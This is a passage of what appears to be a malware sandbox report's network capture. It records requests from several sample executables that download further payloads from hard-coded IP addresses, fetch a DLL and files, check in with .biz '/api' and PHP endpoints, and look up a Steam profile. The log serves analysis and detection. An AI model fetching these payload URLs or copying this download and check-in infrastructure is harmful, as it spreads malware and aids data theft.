                    Content-Type: multipart/form-data; boundary=----U3WBSRQQ9RQQIECJWLNG
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://185.215.113.16/luma/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /luma/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:04 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1847808
                    Last-Modified: Tue, 10 Dec 2024 19:19:40 GMT
                    Connection: keep-alive
                    ETag: "6758944c-1c3200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/steam/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1772032
                    Last-Modified: Tue, 10 Dec 2024 19:19:47 GMT
                    Connection: keep-alive
                    ETag: "67589453-1b0a00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/well/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /well/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 971776
                    Last-Modified: Tue, 10 Dec 2024 19:17:52 GMT
                    Connection: keep-alive
                    ETag: "675893e0-ed400"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/off/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /off/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:19 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2714624
                    Last-Modified: Tue, 10 Dec 2024 19:18:18 GMT
                    Connection: keep-alive
                    ETag: "675893fa-296c00"
                    Accept-Ranges: bytes
                  • flag-nl
                    GET
                    http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/dll/key
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /dll/key HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/dll/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /dll/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 97296
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:07 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:09 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:11 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:15 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:18 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:20 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:22 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:24 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:27 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=88
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:29 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=87
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/soft/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /soft/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: d
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:32 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="dll";
                    Content-Length: 242176
                    Keep-Alive: timeout=5, max=86
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://80.82.65.70/soft/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /soft/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: s
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:34 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="soft";
                    Content-Length: 1502720
                    Keep-Alive: timeout=5, max=85
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-us
                    DNS
                    16.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    16.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    70.65.82.80.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    Response
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    security criminalipcom
                  • flag-us
                    DNS
                    70.65.82.80.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    Response
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    security criminalipcom
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    f3745b045c.exe
                    Remote address:
                    104.21.96.1:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=1rti7gd8m1q38lkot52qn3j6m1; expires=Sat, 05-Apr-2025 13:35:46 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgRo2F1UE1ELIVv9nrAu4EcCO%2BuRG%2F1ZSU3JYq5M0rIX0I0HwGBK6MN7qXXI5kJrn0Ojb48gyHywjs1gQhzZmvvbUkvRW%2FZkqhwwcz1mdwJjqAn1UD%2FlT0X4MvAu3pao7VNqdfY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effc1a3298c7708-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50818&min_rtt=49270&rtt_var=13122&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=609&delivery_rate=74121&cwnd=251&unsent_bytes=0&cid=bdf20502329b77b1&ts=691&x=0"
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • flag-us
                    POST
                    https://covery-mover.biz/api
                    f3745b045c.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=gouc14eom2mq9dd3fl935h95t0; expires=Sat, 05-Apr-2025 13:35:47 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8RaqumKoVFPmNu6B5rPnX%2FVfXfnaLPoOVugBzI1DTTe7E30dmTPGvuOCI%2FP7Q9Kxav72asEKYbg2H%2Ft%2Fv9IZUgDbv6z0HYDQ8fjqlrv4llPTvnG72%2Fe0aZMQLhgaFecXS4W"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effc1a9695f9578-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=49191&min_rtt=48642&rtt_var=11217&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=80573&cwnd=253&unsent_bytes=0&cid=5d11782bc21f0d66&ts=228&x=0"
                  • flag-us
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-gb
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    f3745b045c.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:49:09 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=195e56bd7f2e8a34c512c25c; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • flag-ru
                    GET
                    http://185.215.113.206/
                    0858ba6bc7.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:12 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    POST
                    http://185.215.113.206/c4becf79229cb002.php
                    0858ba6bc7.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:12 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    spocs.getpocket.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    spocs.getpocket.com
                    IN A
                    Response
                    spocs.getpocket.com
                    IN CNAME
                    prod.ads.prod.webservices.mozgcp.net
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    firefox-api-proxy.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy.cdn.mozilla.net
                    IN A
                    Response
                    firefox-api-proxy.cdn.mozilla.net
                    IN CNAME
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.149.97.1
                  • flag-us
                    GET
                    https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                    firefox.exe
                    Remote address:
                    34.149.97.1:443
                    Request
                    GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
                    host: firefox-api-proxy.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    consumer_key: 94110-6d5ff7a89d72c869766af0e0
                    if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
                    te: trailers
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.149.100.209
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                  • flag-us
                    DNS
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.149.97.1
                  • flag-us
                    DNS
